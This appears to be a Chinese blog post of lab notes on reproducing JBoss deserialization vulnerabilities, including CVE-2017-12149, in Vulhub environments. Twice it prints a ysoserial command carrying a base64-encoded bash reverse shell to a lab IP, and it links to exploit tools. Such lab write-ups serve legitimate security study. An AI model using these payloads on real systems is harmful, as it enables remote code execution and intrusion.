jboss漏洞复现

JBoss JMXInvokerServlet 反序列化漏洞

https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/
https://paper.seebug.org/312/
https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。
在这里插入图片描述
访问192.168.33.130:8080/invoker/JMXInvokerServlet只要有文件下载,目标网站即存在JBoss JMXInvokerServlet 反序列化漏洞。
在这里插入图片描述

JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象,所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

在这里插入图片描述在这里插入图片描述

EXP,比如DeserializeExploit.jar,直接用该工具执行命令、上传文件即可:
(工具不给力呀)
在这里插入图片描述

https://bbs.ichunqiu.com/thread-26613-1-1.html

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg

在这里插入图片描述
所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。

编写反弹shell的命令

使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码:http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述
得到编码后命令

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}

序列化数据生成

使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
不知道为啥不成功
在这里插入图片描述

成功反弹shell:
并没有
在这里插入图片描述

https://blog.csdn.net/Jerry____/article/details/103506224
在这里插入图片描述

https://www.cnblogs.com/yuzly/p/11240145.html
这个工具 ↓ 可以 https://github.com/yunxu1/jboss-_CVE-2017-12149
在这里插入图片描述

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

在这里插入图片描述。。。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值